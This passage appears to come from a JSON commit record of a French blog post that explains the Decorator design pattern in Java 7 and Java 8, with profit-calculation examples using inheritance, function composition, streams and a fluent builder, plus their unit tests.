correspond \u00e0 la signature des calculs pr\u00e9sents dans la classe Expenses. L'impl\u00e9mentation de la m\u00e9thode applyAsDouble est effectu\u00e9 avec un calcul par d\u00e9faut.\n\nEt c'est tout... Nous allons pouvoir pouvoir d\u00e9sormais \u00e9crire notre decorator en Java 8, via un test : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenComposingAllDecoratorsWithAndThen_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = new DefaultProfitCalculator()\n .andThen(Expenses::getOperatingExpenses)\n .andThen(Expenses::getDeductibleTaxes) \n .andThen(Expenses::getRemuneration)\n .andThen(Expenses::getExceptionalExpenses).applyAsDouble(turnover);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(32600);\n }\n----\ns \nN'est-ce pas grandiose ? nous avons pu r\u00e9ecrire le pattern d\u00e9corator avec tr\u00e8s peu de ligne de code. \nLe JDK 8 donne la possibilit\u00e9 de composer plusieurs fonctions entre elles via la \"default\" m\u00e9thode \"andThen\". Cette m\u00e9thode est propos\u00e9es dans les fonctions par d\u00e9faut popos\u00e9e par le JDK et le DoubleUnaryOperator en fait partie.\nOn d\u00e9marre \u00e0 partir de la classe DefaultProfitCalculator, et via andThen on la compose avec une autre fonction. Dans cet exemple des appels par r\u00e9f\u00e9rence de m\u00e9thode ont \u00e9t\u00e9 provil\u00e9gi\u00e9 afin d'avoir un code plus concis et plus expressif \"Expenses::getOperatingExpenses\", mais des lambdas expression auraient \u00e9galement fait l'affaire \"e -> Expenses.getOperatingExpenses(e)\".\n\nAinsi il devient tr\u00e8s simple d'ajouter ou de supprimer des decorators, dans l'exemple ci dessous nous supprimons le decorator qui repr\u00e9sente les d\u00e9penses exceptionnelles : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenNotComposingAllDecoratorsWithAndThen_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = new DefaultProfitCalculator()\n .andThen(Expenses::getOperatingExpenses)\n .andThen(Expenses::getDeductibleTaxes)\n .andThen(Expenses::getRemuneration)\n .applyAsDouble(turnover);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(34600);\n }\n----\n\nDans les parties suivantes, nous allons voir d'autres fa\u00e7ons d'impl\u00e9menter le pattern decorator en Java 8.\n\n== b) Decorator en Java 8 avec l'API Stream\n\nDans cette partie, nous allons voir qu'il est possible impl\u00e9menter le pattern decorator avec l'API Stream.\nNous allons cr\u00e9\u00e9 une classe appel\u00e9 StreamDecorator correspondant \u00e0 une enum singleton (instance unique). Cette classe contient une m\u00e9thode appel\u00e9 calculateProfit qui sera expos\u00e9e au client de l'API : \n\n[source,java]\n----\npublic enum StreamDecorator {\n\n \/\/ Single instance.\n INSTANCE;\n\n public double calculateProfit(final double turnover, final DoubleUnaryOperator... operators) {\n return Stream.of(operators).reduce(DoubleUnaryOperator.identity(), DoubleUnaryOperator::andThen)\n .applyAsDouble(turnover);\n }\n}\n----\n\nLe principe i\u00e7i est de passer une suite de fonction represent\u00e9e par des DoubleUnaryOperator (\u00e9quivalent \u00e0 un tableau de fonction). La m\u00e9thode prend \u00e9galement en param\u00e8tre le CA.\nL'API stream propose une factory method permettant d'initialiser une Stream \u00e0 partir d'un tableau. Nous utilisons ensuite la m\u00e9thode \"reduce\" qui permet de r\u00e9duire les \u00e9l\u00e9ments du flux \u00e0 une seule valeur.\n\nEn programation fonctionnelle le reduce correspond \u00e0 du \"fold\". Le principe est de passer 2 fonctions, une initiale (et valeur par d\u00e9faut) et l'autre permettant d'accumuler des \u00e9l\u00e9ments. Il devient, par exemple, tr\u00e8s simple avec ce type d'op\u00e9rateur de calculer la somme des \u00e9lements d'une liste.\nPar exemple : \n\n[source,java]\n----\nreduce(0, (a, b) -> a + b)\n----\n\nOn consid\u00e8re dans cet exemple que a et b sont des entiers.\nLa fonction intiale est la valeur 0. La somme des \u00e9l\u00e9ments de la liste vont commencer par d\u00e9faut et l'accumulateur \"(a, b) -> a + b\" va permettre de sommer chaque \u00e9lements de la liste au fur et \u00e0 mesure (somme le r\u00e9sultat de l'it\u00e9ration pr\u00e9c\u00e9dente avec le r\u00e9sultat de l'it\u00e9ration en cours). Si la structure est vide la valeur initiale est retourn\u00e9e, c'est \u00e0 dire 0. La fonction initiale est \u00e9galement la valeur par d\u00e9faut si la structure est vide.\n\nNotre exemple suit le m\u00eame principe, la fonction initiale est \"DoubleUnaryOperator.identity()\" et l'accumulateur est \"DoubleUnaryOperator::andThen\" ou \"(ope1, ope2) -> ope1.andThen(ope2)\". Comme vu pr\u00e9c\u00e9demment \u00e0 chaque it\u00e9ration \"andThen\" va permettre de composer la fonction pr\u00e9c\u00e9dente avec la fonction en cours. Si la structure est vide \"DoubleUnaryOperator.identity()\" sera retourn\u00e9 (dans ce cas un fonction vide).\n\nVoici le code du test utilisant un exemple avec tous les decorator : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenComposingAllDecoratorsWithStream_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = StreamDecorator.INSTANCE.calculateProfit(turnover,\n new DefaultProfitCalculator(), Expenses::getOperatingExpenses, Expenses::getDeductibleTaxes,\n Expenses::getRemuneration, Expenses::getExceptionalExpenses);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(32600);\n }\n----\n\nLa m\u00e9thode \"calculateProfit\" est appel\u00e9e avec la CA et la liste des fonctions decorator s\u00e9par\u00e9e une virgule. Ceci a \u00e9t\u00e9 via la param\u00e8tre de m\u00e9thode suivant : \"DoubleUnaryOperator... operators\".\nDe nouveau le client de l'API dispose d'un traitement tr\u00e8s souple, facilement modifiable et \u00e9volutif.\n\nUn exemple sans le decorator \"ExceptionalExpenses\" : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenNotComposingAllDecoratorsWithStream_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = StreamDecorator.INSTANCE.calculateProfit(turnover,\n new DefaultProfitCalculator(), Expenses::getOperatingExpenses, Expenses::getDeductibleTaxes,\n Expenses::getRemuneration);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(34600);\n }\n----\n\n\n== b) Decorator en Java 8 avec une API fluent\n\nDans cette derni\u00e8re partie, nous allons voir qu'il est possible d'impl\u00e9menter le decorator via une API fluent et permettant d'indiquer clairement au client de l'API les traitement effectu\u00e9s.\nL'objectif va \u00eatre de cr\u00e9er une classe Wrapper de type builder afin de composer nos fonctions de fa\u00e7on fluide.\n\nVoici le code complet de la classe appel\u00e9e FluentDecorator : \n\n[source,java]\n----\npublic final class FluentDecorator<T> {\n\n private final T value;\n private final Function<T, T> function;\n\n private FluentDecorator(final T value, Function<T, T> function) {\n this.value = value;\n this.function = function;\n }\n\n public static <T> FluentDecorator<T> from(final T value) {\n Objects.requireNonNull(value); \n return new FluentDecorator<>(value, Function.identity());\n }\n\n public FluentDecorator<T> with(final Function<T, T> otherFunction) {\n return new FluentDecorator<T>(this.value, function.andThen(otherFunction));\n }\n\n public T calculate() {\n return this.function.apply(value);\n }\n}\n----\n\nLe fluent decorator se base sur une valeur de type T (n'importe quel type via les Generics en Java) et enveloppe une Function<T,T>, c'est \u00e0 dire une fonction prenant un \u00e9l\u00e9ment de type T en entr\u00e9 en retournant un \u00e9lement de m\u00eame type (comme le DoubleUnaryOperator).\n\n[source,java]\n----\n private final T value;\n private final Function<T, T> function;\n----\n\nUn constructeur priv\u00e9 permet prend en param\u00e8tre les 2 \u00e9l\u00e9ments expliqu\u00e9s pr\u00e9c\u00e9demment (l'aspect priv\u00e9 permet d'empecher l'instantiation en dehors de la classe) : \n\n[source,java]\n----\nprivate FluentDecorator(final T value, Function<T, T> function) {\n this.value = value;\n this.function = function;\n}\n----\n\nUne static factory method est expos\u00e9 au client de l'API pour initialiser la classe avec un nom parlant. Cette m\u00e9thode s'appelle \"from\" et se base sur la valeur qui servira de base de calcul, dans notre cas le CA; \nUn contr\u00f4le est effectu\u00e9 sur la valeur afin de renvoyer une runtime exception si la valeur est nulle. Le constructeur de la classe est appel\u00e9 avec cette valeur et une fonction initiale vide (ainsi le param\u00e8tre global \"function\" de la classe ne sera pas nul et on \u00e9vitera des nullPointerException).\n\n[source,java]\n----\npublic static <T> FluentDecorator<T> from(final T value) {\n Objects.requireNonNull(value);\n return new FluentDecorator<>(value, Function.identity());\n}\n----\n\nLa composition des decorator se fait via la m\u00e9thode \"with\" qui prend en param\u00e8tre la fonction \u00e0 ajouter \u00e0 la composition g\u00e9n\u00e9rale. Le but est de rappeler de nouveau le constructeur de la classe mais cette fois ci de la fa\u00e7on suivante : \n\n[source,java]\n----\nnew FluentDecorator<T>(this.value, function.andThen(otherFunction))\n----\n\nLa \"value\" global \u00e0 la classe est repass\u00e9e en param\u00e8tre et la fonction globale est compos\u00e9 avec \"otherFunction\" (via andThen). Le r\u00e9sultat de cette composition est repass\u00e9 en param\u00e8tre de la classe FluentDecorator.\nVoici le code la m\u00e9thode : \n\n[source,java]\n----\npublic FluentDecorator<T> with(final Function<T, T> otherFunction) {\n return new FluentDecorator<T>(this.value, function.andThen(otherFunction));\n}\n----\n\nLors de l'appel \u00e0 la m\u00e9thode \"with\", le traitelent est lazy car, \u00e0 ce moment la fonction n'est pas execut\u00e9e.\n\nUne m\u00e9thode finale permet d'executer la fonction globale \u00e0 la classe avec la valeur globale, \"function.apply(value)\". AInsi le r\u00e9sultat de la fonction est r\u00e9cup\u00e9r\u00e9, dans notre cas le calcul du b\u00e9n\u00e9fice : \n\n[source,java]\n----\npublic T calculate() {\n return this.function.apply(value);\n}\n----\n\nVoici le code du test avec tous les decorators : \n\n[source,java]\n----\n @Test\n public void givenTurnover_whenComposingAllDecoratorsWithFluentStyle_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = FluentDecorator\n .from(turnover)\n .with(Expenses::getTransportExpenses)\n .with(Expenses::getOperatingExpenses)\n .with(Expenses::getDeductibleTaxes)\n .with(Expenses::getRemuneration)\n .with(Expenses::getExceptionalExpenses)\n .calculate();\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(32600);\n }\n----\n\nEt le code sans le decorator \"ExceptionalExpenses\" : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenNotComposingAllDecoratorsWithFluentStyle_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = FluentDecorator\n .from(turnover)\n .with(Expenses::getTransportExpenses)\n .with(Expenses::getOperatingExpenses)\n .with(Expenses::getDeductibleTaxes)\n .with(Expenses::getRemuneration).calculate();\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(34600);\n }\n----\n\n\n\n\n\n","old_contents":"= Pattern Decorator en Java 8\n:published_at: 2017-03-21\n:source-highlighter: highlightjs\n\n== 1) Introduction\n\nL'objectif de cette article est de parler d'un des pattern du GOF (gang of four) assez connu, qui est le decorator.\nCe patron de conception correspond \u00e0 un design pattern de type comportement (behavioural pattern).\n\nEn gros l'id\u00e9e de ce pattern est d'ajouter du comportement \u00e0 du code au runtime (c'est \u00e0 dire \u00e0 l'execution du code).\nCe pattern pr\u00e9sente de nombreux avantages car lorsque la conception a \u00e9t\u00e9 mise en place, il devient tr\u00e8s simple d'ajouter du comportement au code existant, ce qui le rend tr\u00e8s evolutif.\n\nAvant Java 8, malgr\u00e9 l'aspect interessant \u00e9voqu\u00e9 pr\u00e9c\u00e9dement, ce pattern n'\u00e9tait pas beaucoup utilis\u00e9 car le code n\u00e9cessaire \u00e0 sa mise en place \u00e9tait tr\u00e8s verbeux.\nEn effet le design de code \u00e9tait bas\u00e9 sur l'h\u00e9ritage, ce qui obligeait le d\u00e9veloppeur \u00e0 \u00e9crire une interface par d\u00e9corator, assez qu'une classe abstraite. La verbosit\u00e9 induite par ce type de d\u00e9v\u00e9loppement pouvait d\u00e9courager pas mal de d\u00e9veloppeurs.\n\nEn Java 8 avec l'apport des lambdas, nous allons montrer que le decorator est beaucoup plus simple \u00e0 impl\u00e9menter, moins verbeux, fonctionnel et plus lisible pour le client de l'API.\n\nL'article se d\u00e9compose en 2 partie consistant \u00e0 montrer le code et la conception du decorator avant et apr\u00e8s Java 8. En Java 8 nous montrerons diff\u00e9rentes techniques.\n\nL'exemple choisi pour illustrer ce pattern, est le calcul du b\u00e9n\u00e9fice d'une entreprise. Chaque nouveau decorator permettra d'ajouter un calcul au runtime \u00e0 la formule g\u00e9n\u00e9rale.\n\n== 2) Decorator en Java 7\n\nPremi\u00e8rement une interface d\u00e9finissant le contrat doit \u00eatre cr\u00e9\u00e9e, nous allons l'appeler ProfitCalculator (calculateur de b\u00e9n\u00e9fice). Voici le code de cette interface : \n\n[source,java]\n----\npublic interface ProfitCalculator {\n\n double calculate(double turnover);\n} \n----\n\nUn calculateur de profit dispose d'une m\u00e9thode abstraite \"calculate\", qui va appliquer un nouveau calcul au CA pass\u00e9 en param\u00e8tre.\n\nEnsuite il faut cr\u00e9er une classe abstraite que l'on va appeler AbstractProfitDecorator : \n\n[source,java]\n----\npublic abstract class AbstractProfitDecorator implements ProfitCalculator {\n\n private final ProfitCalculator profitCalculator;\n\n public AbstractProfitDecorator(ProfitCalculator profitCalculator) {\n this.profitCalculator = profitCalculator;\n }\n\n protected abstract double applyExpense(double turnover);\n\n @Override\n public double calculate(double turnover) {\n double profit = profitCalculator.calculate(turnover);\n return applyExpense(profit);\n }\n}\n----\n\nCette classe impl\u00e9mente l'interface pr\u00e9c\u00e9dente et doit donc proposer l'impl\u00e9mentation de la m\u00e9thode \"calculate(double turnover)\". \nChaque d\u00e9corator va appliquer une d\u00e9pense en proposant l'impl\u00e9mentation de la m\u00e9thode \"applyExpense(double turnover)\".\n\nUne subtilit\u00e9 est \u00e0 constater i\u00e7i, la classe prend \u00e9galement en param\u00e8tre l'interface \"ProfitCalculator\". \nEn effet, chaque decorator va appliquer le calcul du decorator qui le pr\u00e9c\u00e8de et va ensuite y ajouter son calcul \u00e0 lui. C'est ce comportement qui permet d'ajouter des traitements au runtime.\n\nNous allons commencer par une classe proposant un calcul par d\u00e9faut, appel\u00e9 \"DefaultProfitCalculator\". Il est en effet utile de commencer par une classe de type \"profitCalculator\" qui ne d\u00e9pend de rien lors de son instantiation. Ceci correspond au calcul initial des decorators : \n\n[source,java]\n----\npublic class DefaultProfitCalculator implements ProfitCalculator {\n\n @Override\n public double calculate(double turnover) {\n return Expenses.getTransportExpenses(turnover);\n }\n}\n----\n\nNous allons ensuite montrer le code des diff\u00e9rents decorators : \n\nCharges d'exploitation => OperatingExpensesDecorator : \n[source,java]\n----\npublic class OperatingExpensesDecorator extends AbstractProfitDecorator {\n\n public OperatingExpensesDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getOperatingExpenses(turnover);\n }\n}\n----\n\nR\u00e9mun\u00e9ration => RemunerationDecorator : \n[source,java]\n----\npublic class RemunerationDecorator extends AbstractProfitDecorator {\n\n public RemunerationDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getRemuneration(turnover);\n }\n}\n----\n\nD\u00e9penses exceptionnelles => ExceptionalExpensesDecorator : \n[source,java]\n----\npublic class ExceptionalExpensesDecorator extends AbstractProfitDecorator {\n\n public ExceptionalExpensesDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getExceptionalExpenses(turnover);\n }\n}\n----\n\nTaxes d\u00e9ductible => DeductibleTaxesDecorator : \n[source,java]\n----\npublic class DeductibleTaxesDecorator extends AbstractProfitDecorator {\n\n public DeductibleTaxesDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getDeductibleTaxes(turnover);\n }\n}\n----\n\nLe principe de chaque dcorator est le m\u00eame, chacun doit proposer une impl\u00e9mentation de la m\u00e9thide \"applyExpense\". Il est noter que les cas choisis ne refl\u00e8tent pas forcemment la r\u00e9alit\u00e9, mais servent juste d'exemple.\nUne \"garbage class\" appel\u00e9e Expenses contient des m\u00e9thodes statiques permettant de calculer chaque cas. Nous monterons cette classe un peu plus tard.\n\nNous allons d\u00e9sormais passer aux tests d'int\u00e9gration et \u00e0 l'appel des d\u00e9corators. \n\nLe premier test permet de composer tous les d\u00e9corators : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenComposingAllDecorators_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit =\n new ExceptionalExpensesDecorator(new RemunerationDecorator(new DeductibleTaxesDecorator(new OperatingExpensesDecorator(new DefaultProfitCalculator())))).calculate(turnover);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(32600);\n }\n----\n\nLe calcul commence de droite \u00e0 gauche, on commence par le DefaultProfitCalculator, enuite cette classe est pass\u00e9e en param\u00e8tre du d\u00e9corator OperatingExpensesDecorator et ainsi de suite.\nOperatingExpensesDecorator applique le calcul de DefaultProfitCalculator plus le sien.\n\nVoici un second test qui n'applique pas tous les d\u00e9corator, et montre qu'il est tr\u00e8s simple d'ajouter ou de supprimer un decorator au runtime. Le code peut ainsi \u00eatre \u00e9volutif : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenNotComposingAllDecorators_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = new RemunerationDecorator(new DeductibleTaxesDecorator(new OperatingExpensesDecorator(new DefaultProfitCalculator()))).calculate(turnover);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(34600);\n }\n----\n\nAu niveau du client de l'API, nous avons la confirmation que le pattern est inter\u00e9ssant \u00e0 utiliser de part sa souplesse et du fait qu'il est possible d'ajouter un nouveau calcul (ou dans un autre cas une nouvelle r\u00e8gle) juste en cr\u00e9ant un nouveau d\u00e9corator et sans casser tous la conception mise en place.\n\nCependant nous constatons que la mise en place de ce patron de conception, est tr\u00e8s verbeuse. Beaucoup de classes et de lignes de codes doivent \u00eatre \u00e9crites pour mettre en place ce type de design de code. \nDe plus, le fait qu'il soit orient\u00e9 h\u00e9ritage peut rendre sa compr\u00e9h\u00e9nsion compliqu\u00e9e. Tous ces \u00e9l\u00e9ments peuvent dissuader le d\u00e9veloppeur \u00e0 mettre en place ce type de conception.\n\nUn des exemples de l'utilisation de ce pattern dans le JDK est la classe .....\n\nNous allons voir dans la deuxi\u00e8me partie comment refaire le pattern decorator en Java 8 avec des lambdas et des fonctions; et de montrer que l'\u00e9criture est beaucoup plus simple et beaucoup moins verbeuse.\n\n== 2) Decorator en Java 8\n\nNous allons commencer par montrer les m\u00e9thodes statiques propos\u00e9es par la garbage classe Expenses : \n\n[source,java]\n----\npublic class Expenses {\n\n public static double getTransportExpenses(final double turnover) {\n return turnover - 2400;\n }\n\n public static double getOperatingExpenses(final double turnover) {\n return turnover - 15000;\n }\n\n public static double getDeductibleTaxes(final double turnover) {\n return turnover - 3000;\n }\n\n public static double getRemuneration(final double turnover) {\n return turnover - 45000;\n }\n\n public static double getExceptionalExpenses(final double turnover) {\n return turnover - 2000;\n }\n}\n----\n\nChaque m\u00e9thode statique effectue le calcul souhait\u00e9 en prenant un double en param\u00e8tre et en retournant en sortie.\n\nNous allons ensuite montrer diff\u00e9rente fa\u00e7ons d'impl\u00e9menter ce pattern en Java 8.\n\n== a) Decorator en Java 8 avec de la composition de fonctions\n\nComme pour la partie Java 7, nous allons \u00e9crire une classe contenant le calcul par d\u00e9faut : \n\n[source,java]\n----\npublic class DefaultProfitCalculator implements DoubleUnaryOperator {\n\n @Override\n public double applyAsDouble(final double operand) {\n return Expenses.getTransportExpenses(operand);\n }\n}\n----\n\nCette classe impl\u00e9mente une interface fonctionnelle propos\u00e9e par d\u00e9faut dans le JDK 8 DoubleUnaryOperator. Cette fonction prend un double en entr\u00e9e et retourne un double en sortie, ce qui correspond \u00e0 la signature des calculs pr\u00e9sents dans la classe Expenses. L'impl\u00e9mentation de la m\u00e9thode applyAsDouble est effectu\u00e9 avec un calcul par d\u00e9faut.\n\nEt c'est tout... Nous allons pouvoir pouvoir d\u00e9sormais \u00e9crire notre decorator en Java 8, via un test : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenComposingAllDecoratorsWithAndThen_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = new DefaultProfitCalculator()\n .andThen(Expenses::getOperatingExpenses)\n .andThen(Expenses::getDeductibleTaxes) \n .andThen(Expenses::getRemuneration)\n .andThen(Expenses::getExceptionalExpenses).applyAsDouble(turnover);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(32600);\n }\n----\ns \nN'est-ce pas grandiose ? nous avons pu r\u00e9ecrire le pattern d\u00e9corator avec tr\u00e8s peu de ligne de code. \nLe JDK 8 donne la possibilit\u00e9 de composer plusieurs fonctions entre elles via la \"default\" m\u00e9thode \"andThen\". Cette m\u00e9thode est propos\u00e9es dans les fonctions par d\u00e9faut popos\u00e9e par le JDK et le DoubleUnaryOperator en fait partie.\nOn d\u00e9marre \u00e0 partir de la classe DefaultProfitCalculator, et via andThen on la compose avec une autre fonction. Dans cet exemple des appels par r\u00e9f\u00e9rence de m\u00e9thode ont \u00e9t\u00e9 provil\u00e9gi\u00e9 afin d'avoir un code plus concis et plus expressif \"Expenses::getOperatingExpenses\", mais des lambdas expression auraient \u00e9galement fait l'affaire \"e -> Expenses.getOperatingExpenses(e)\".\n\nAinsi il devient tr\u00e8s simple d'ajouter ou de supprimer des decorators, dans l'exemple ci dessous nous supprimons le decorator qui repr\u00e9sente les d\u00e9penses exceptionnelles : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenNotComposingAllDecoratorsWithAndThen_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = new DefaultProfitCalculator()\n .andThen(Expenses::getOperatingExpenses)\n .andThen(Expenses::getDeductibleTaxes)\n .andThen(Expenses::getRemuneration)\n .applyAsDouble(turnover);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(34600);\n }\n----\n\nDans les parties suivantes, nous allons voir d'autres fa\u00e7ons d'impl\u00e9menter le pattern decorator en Java 8.\n\n== b) Decorator en Java 8 avec l'API Stream\n\nDans cette partie, nous allons voir qu'il est possible impl\u00e9menter le pattern decorator avec l'API Stream.\nNous allons cr\u00e9\u00e9 une classe appel\u00e9 StreamDecorator correspondant \u00e0 une enum singleton (instance unique). Cette classe contient une m\u00e9thode appel\u00e9 calculateProfit qui sera expos\u00e9e au client de l'API : \n\n[source,java]\n----\npublic enum StreamDecorator {\n\n \/\/ Single instance.\n INSTANCE;\n\n public double calculateProfit(final double turnover, final DoubleUnaryOperator... operators) {\n return Stream.of(operators).reduce(DoubleUnaryOperator.identity(), DoubleUnaryOperator::andThen)\n .applyAsDouble(turnover);\n }\n}\n----\n\nLe principe i\u00e7i est de passer une suite de fonction represent\u00e9e par des DoubleUnaryOperator (\u00e9quivalent \u00e0 un tableau de fonction). La m\u00e9thode prend \u00e9galement en param\u00e8tre le CA.\nL'API stream propose une factory method permettant d'initialiser une Stream \u00e0 partir d'un tableau. Nous utilisons ensuite la m\u00e9thode \"reduce\" qui permet de r\u00e9duire les \u00e9l\u00e9ments du flux \u00e0 une seule valeur.\n\nEn programation fonctionnelle le reduce correspond \u00e0 du \"fold\". Le principe est de passer 2 fonctions, une initiale (et valeur par d\u00e9faut) et l'autre permettant d'accumuler des \u00e9l\u00e9ments. Il devient, par exemple, tr\u00e8s simple avec ce type d'op\u00e9rateur de calculer la somme des \u00e9lements d'une liste.\nPar exemple : \n\n[source,java]\n----\nreduce(0, (a, b) -> a + b)\n----\n\nOn consid\u00e8re dans cet exemple que a et b sont des entiers.\nLa fonction intiale est la valeur 0. La somme des \u00e9l\u00e9ments de la liste vont commencer par d\u00e9faut et l'accumulateur \"(a, b) -> a + b\" va permettre de sommer chaque \u00e9lements de la liste au fur et \u00e0 mesure (somme le r\u00e9sultat de l'it\u00e9ration pr\u00e9c\u00e9dente avec le r\u00e9sultat de l'it\u00e9ration en cours). Si la structure est vide la valeur initiale est retourn\u00e9e, c'est \u00e0 dire 0. La fonction initiale est \u00e9galement la valeur par d\u00e9faut si la structure est vide.\n\nNotre exemple suit le m\u00eame principe, la fonction initiale est \"DoubleUnaryOperator.identity()\" et l'accumulateur est \"DoubleUnaryOperator::andThen\" ou \"(ope1, ope2) -> ope1.andThen(ope2)\". Comme vu pr\u00e9c\u00e9demment \u00e0 chaque it\u00e9ration \"andThen\" va permettre de composer la fonction pr\u00e9c\u00e9dente avec la fonction en cours. Si la structure est vide \"DoubleUnaryOperator.identity()\" sera retourn\u00e9 (dans ce cas un fonction vide).\n\nVoici le code du test utilisant un exemple avec tous les decorator : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenComposingAllDecoratorsWithStream_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = StreamDecorator.INSTANCE.calculateProfit(turnover,\n new DefaultProfitCalculator(), Expenses::getOperatingExpenses, Expenses::getDeductibleTaxes,\n Expenses::getRemuneration, Expenses::getExceptionalExpenses);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(32600);\n }\n----\n\nLa m\u00e9thode \"calculateProfit\" est appel\u00e9e avec la CA et la liste des fonctions decorator s\u00e9par\u00e9e une virgule. Ceci a \u00e9t\u00e9 via la param\u00e8tre de m\u00e9thode suivant : \"DoubleUnaryOperator... operators\".\nDe nouveau le client de l'API dispose d'un traitement tr\u00e8s souple, facilement modifiable et \u00e9volutif.\n\nUn exemple sans le decorator \"ExceptionalExpenses\" : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenNotComposingAllDecoratorsWithStream_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = StreamDecorator.INSTANCE.calculateProfit(turnover,\n new DefaultProfitCalculator(), Expenses::getOperatingExpenses, Expenses::getDeductibleTaxes,\n Expenses::getRemuneration);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(34600);\n }\n----\n\n\n== b) Decorator en Java 8 avec une API fluent\n\nDans cette derni\u00e8re partie, nous allons voir qu'il est possible d'impl\u00e9menter le decorator via une API fluent et permettant d'indiquer clairement au client de l'API les traitement effectu\u00e9s.\nL'objectif va \u00eatre de cr\u00e9er une classe Wrapper de type builder afin de composer nos fonctions de fa\u00e7on fluide.\n\nVoici le code complet de la classe appel\u00e9e FluentDecorator : \n\n[source,java]\n----\npublic final class FluentDecorator<T> {\n\n private final T value;\n private final Function<T, T> function;\n\n private FluentDecorator(final T value, Function<T, T> function) {\n this.value = value;\n this.function = function;\n }\n\n public static <T> FluentDecorator<T> from(final T value) {\n Objects.requireNonNull(value); \n return new FluentDecorator<>(value, Function.identity());\n }\n\n public FluentDecorator<T> with(final Function<T, T> otherFunction) {\n return new FluentDecorator<T>(this.value, function.andThen(otherFunction));\n }\n\n public T calculate() {\n return this.function.apply(value);\n }\n}\n----\n\nLe fluent decorator se base sur une valeur de type T (n'importe quel type via les Generics en Java) et enveloppe une Function<T,T>, c'est \u00e0 dire une fonction prenant un \u00e9l\u00e9ment de type T en entr\u00e9 en retournant un \u00e9lement de m\u00eame type (comme le DoubleUnaryOperator).\n\n[source,java]\n----\n private final T value;\n private final Function<T, T> function;\n----\n\nUn constructeur priv\u00e9 permet prend en param\u00e8tre les 2 \u00e9l\u00e9ments expliqu\u00e9s pr\u00e9c\u00e9demment (l'aspect priv\u00e9 permet d'empecher l'instantiation en dehors de la classe) : \n\n[source,java]\n----\nprivate FluentDecorator(final T value, Function<T, T> function) {\n this.value = value;\n this.function = function;\n}\n----\n\nUne static factory method est expos\u00e9 au client de l'API pour initialiser la classe avec un nom parlant. Cette m\u00e9thode s'appelle \"from\" et se base sur la valeur qui servira de base de calcul, dans notre cas le CA; \nUn contr\u00f4le est effectu\u00e9 sur la valeur afin de renvoyer une runtime exception si la valeur est nulle. Le constructeur de la classe est appel\u00e9 avec cette valeur et une fonction initiale vide (ainsi le param\u00e8tre global \"function\" de la classe ne sera pas nul et on \u00e9vitera des nullPointerException).\n\n[source,java]\n----\npublic static <T> FluentDecorator<T> from(final T value) {\n Objects.requireNonNull(value);\n return new FluentDecorator<>(value, Function.identity());\n}\n----\n\nLa composition des decorator se fait via la m\u00e9thode \"with\" qui prend en param\u00e8tre la fonction \u00e0 ajouter \u00e0 la composition g\u00e9n\u00e9rale. Le but est de rappeler de nouveau le constructeur de la classe mais cette fois ci de la fa\u00e7on suivante : \n\n[source,java]\n----\nnew FluentDecorator<T>(this.value, function.andThen(otherFunction))\n----\n\nLa \"value\" global \u00e0 la classe est repass\u00e9e en param\u00e8tre et la fonction globale est compos\u00e9 avec \"otherFunction\" (via andThen). Le r\u00e9sultat de cette composition est repass\u00e9 en param\u00e8tre de la classe FluentDecorator.\nVoici le code la m\u00e9thode : \n\n[source,java]\n----\npublic FluentDecorator<T> with(final Function<T, T> otherFunction) {\n return new FluentDecorator<T>(this.value, function.andThen(otherFunction));\n}\n----\n\nLors de l'appel \u00e0 la m\u00e9thode \"with\", le traitelent est lazy car, \u00e0 ce moment la fonction n'est pas execut\u00e9e.\n\nUne m\u00e9thode finale permet d'executer la fonction globale \u00e0 la classe avec la valeur globale, \"function.apply(value)\". AInsi le 